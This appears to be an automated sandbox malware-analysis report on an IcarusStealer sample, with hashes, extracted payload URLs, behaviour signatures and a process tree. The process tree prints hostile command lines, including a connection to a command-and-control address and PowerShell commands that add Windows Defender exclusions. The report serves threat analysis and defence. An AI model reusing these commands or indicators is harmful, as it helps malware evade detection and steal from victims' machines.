Analysis

  • max time kernel
    147s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    06/10/2024, 01:07

General

  • Target

    3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe

  • Size

    3.9MB

  • MD5

    65a683124fc4ca1839e95322370e2b0d

  • SHA1

    7a7eafcfa4349e40cb15ab30b5c64d3415e60b96

  • SHA256

    3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f

  • SHA512

    14b6d7d06f1bd02fffa5f0a4aecb8bbb7b1441597d9ac27a888f5ff441fce785809bd675c7ef7b1da7f99a8d61100e030b6c8b7b128515e8d713d4ffec54123f

  • SSDEEP

    49152:bP70hwGvLJT/a9yLe7lAsYaxBjbdOGMneGzxgUgoJUcaqCDx6ITcP2MNoSPhaC+O:nUgoJUBZJoP2MNBajvXOSq

Malware Config

Extracted

Family

icarusstealer

Attributes
  • payload_url

    https://blackhatsec.org/add.jpg

    https://blackhatsec.org/remove.jpg

Signatures

  • IcarusStealer

    Icarus is a modular stealer written in C# First adverts in July 2022.

  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 27 IoCs
  • Suspicious use of SendNotifyMessage 17 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe
    "C:\Users\Admin\AppData\Local\Temp\3ff0d50557b5ba7eb306048c0e20dd4304a75aeab0470fe213c5089a031a396f.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2704
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2708
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Boot or Logon Autostart Execution: Active Setup
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\system32\ctfmon.exe
          ctfmon.exe
          4⤵
            PID:2404
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
          3⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2812
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2168
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1236
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1800
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:640

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      159fb1072b0d2a7c3edd1cc5171c54eb

      SHA1

      128382ea964999afa7bf98efce1666662b3743ce

      SHA256

      ee53690f825518288d10dd750fb1eb05e838ca6eb952c671ee11e0011b75cce3

      SHA512

      64cb354a66b8304fb52b271095ef3759fcb030726fba2da096a43951299720aad1495c216259414eb821428a7a9554476f597e56590670c9cbff9fc040912115

    • memory/2704-12-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-2-0x0000000000420000-0x0000000000438000-memory.dmp

      Filesize

      96KB

    • memory/2704-1-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-4-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-6-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-5-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-8-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-7-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-40-0x0000000000420000-0x0000000000438000-memory.dmp

      Filesize

      96KB

    • memory/2704-18-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2704-0-0x0000000000400000-0x0000000000823000-memory.dmp

      Filesize

      4.1MB

    • memory/2708-9-0x0000000000080000-0x0000000000102000-memory.dmp

      Filesize

      520KB

    • memory/2708-17-0x0000000000080000-0x0000000000102000-memory.dmp

      Filesize

      520KB

    • memory/2708-14-0x0000000000080000-0x0000000000102000-memory.dmp

      Filesize

      520KB

    • memory/2708-19-0x0000000073B9E000-0x0000000073B9F000-memory.dmp

      Filesize

      4KB

    • memory/2708-41-0x0000000073B90000-0x000000007427E000-memory.dmp

      Filesize

      6.9MB

    • memory/2708-11-0x0000000000080000-0x0000000000102000-memory.dmp

      Filesize

      520KB

    • memory/2708-27-0x0000000073B90000-0x000000007427E000-memory.dmp

      Filesize

      6.9MB

    • memory/2708-10-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2812-24-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/2812-21-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-31-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-29-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-20-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-22-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-23-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2812-26-0x0000000000400000-0x0000000000424000-memory.dmp

      Filesize

      144KB

    • memory/2900-45-0x0000000002AD0000-0x0000000002AE0000-memory.dmp

      Filesize

      64KB